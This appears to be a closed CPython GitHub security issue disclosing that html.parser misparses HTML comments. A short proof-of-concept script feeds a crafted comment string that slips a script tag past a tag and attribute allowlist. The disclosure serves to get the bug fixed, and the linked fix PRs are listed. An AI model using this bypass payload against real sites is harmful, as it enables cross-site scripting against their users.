- 
          
- 
                Notifications
    You must be signed in to change notification settings 
- Fork 33.2k
Closed
Labels
stdlibStandard Library Python modules in the Lib/ directoryStandard Library Python modules in the Lib/ directorytype-securityA security issueA security issue
Description
Description
The library html.parser allows an attacker to bypass any whitelist of HTML tags and attributes that seek to mitigate XSS. This is possible because the application does not correctly parse the HTML comments in the user input.
Vulnerability
This vulnerability occurs because the application does not correctly parse the HTML comments in the user input.
Exploitation
In this scenario a developer parses the HTML entered by the user to validate it with an allowlist of tags and attributes. This is to prevent XSS attacks. In this case we see how we can bypass a security check of this type, thanks to the fact that the parser does not parse the HTML comments properly.
poc.py
from html.parser import HTMLParser
from html.entities import name2codepoint
class MyHTMLParser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        print("Start tag:", tag)
        # Whitelist Tags
        print("Invalid tag:",tag != "h1")
        for attr in attrs:
            # Whitelist Attr
            print("attr:", attr)
            print("Invalid attr:",attr != "alt")
    def handle_endtag(self, tag):
        print("End tag  :", tag)
    def handle_data(self, data):
        print("Data     :", data)
    def handle_comment(self, data):
        print("Comment  :", data)
    def handle_entityref(self, name):
        c = chr(name2codepoint[name])
        print("Named ent:", c)
    def handle_charref(self, name):
        if name.startswith('x'):
            c = chr(int(name[1:], 16))
        else:
            c = chr(int(name))
        print("Num ent  :", c)
    def handle_decl(self, data):
        print("Decl     :", data)
parser = MyHTMLParser()
parser.feed('<!--!> <h1 value="--!><script>alert(document.domain)</script>')
# HTML is safe, we can proceedEvidence of exploitation
Expected behavior
System Information
- CPython versions tested on: Python 3.10.8
- Operating system and architecture: GNU/Linux x86_64
Linked PRs
- gh-102555 Increase HTML standard compliance for closing comment tags #117406
- gh-102555: Fix comment parsing in HTMLParser #135664
- [3.14] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136271
- [3.13] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136272
- [3.12] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136273
- [3.11] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136274
- [3.10] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136275
- [3.9] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136276
Metadata
Metadata
Assignees
Labels
stdlibStandard Library Python modules in the Lib/ directoryStandard Library Python modules in the Lib/ directorytype-securityA security issueA security issue
Projects
Status
Done

